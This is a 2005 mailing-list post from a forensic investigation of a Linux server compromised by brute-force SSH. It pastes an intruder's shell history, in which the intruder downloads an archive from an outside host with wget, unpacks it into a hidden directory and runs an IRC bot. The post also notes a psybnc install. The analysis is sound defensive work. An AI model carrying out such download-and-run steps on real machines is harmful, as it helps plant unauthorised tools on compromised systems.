brute force ssh attack
Daniel Kirsten
Daniel.Kirsten at gmx.net
Wed Apr 27 13:41:23 UTC 2005
>Were there any interesting files in the users' home directories? (Look for
>hidden files too, of course -- maybe a hidden directory named ... or
>something.) Also check in /tmp and /var. And any luck with the
>.bash_history? (For both the users and for root....)
This is ~daikanyama/.bash_history
passwd
ls
w
wget www.ring.as.ro/x/qwe.tgz
tar zxvf qwe.tgz
rm -rf qwe.tgz
cd .undernet
./mech
./mech
./mech
./mech
There is a complex directory tree under ~daikanyama/.undernet
There are no interesting files under ~kevin.
Kevin had tcsh as login shell. Using ps aux, I have seen that kevin
used ftp, and kevin also used passwd.
One of the users compiled something, I have seen that they utilized
"make". Kevin installed some program psybnc under /var/tmp
There is nothing interesting in /tmp and /root (root has tcsh as
login shell).
--
+++ Sparen beginnt mit GMX DSL: http://www.gmx.net/de/go/dsl
More information about the fedora-list
mailing list